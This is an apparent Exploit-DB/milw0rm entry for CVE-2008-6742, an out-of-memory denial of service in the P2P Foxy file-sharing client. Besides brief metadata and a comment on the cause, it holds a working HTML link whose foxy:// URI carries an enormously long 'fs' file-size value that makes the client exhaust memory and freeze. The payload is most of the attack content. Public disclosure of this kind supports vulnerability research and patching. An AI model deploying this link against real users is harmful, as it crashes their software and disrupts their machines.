P2P Foxy - Out of Memory Denial of Service

Author: Styxosaurus
type: dos
platform: windows
port: 
date_added: 2008-06-16 
date_updated:  
verified: 1 
codes: OSVDB-53904;CVE-2008-6742 
tags: 
aliases:  
screenshot_url:  
application_url: 

P2P Foxy Out of memory Exploit

# Vulnerability Discovered by Styxosaurus
# Styxosaurus [at] gmail [dot] com
#
# Foxy is one of the most popular P2P software in Chinese users
# http://tw.gofoxy.net/
#
# It starts to request more memory and freeze
# as when "&fs=" meet some large magic point.


<a href='foxy://download? xt=urn:sha1:FPLNO5OUPWLSRWYZ4J4ZNAIJLEPSIND4
&dn=music.wmv&fs=1000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000
0000000000000000000000000'>Music.wmv</a>

# milw0rm.com [2008-06-17]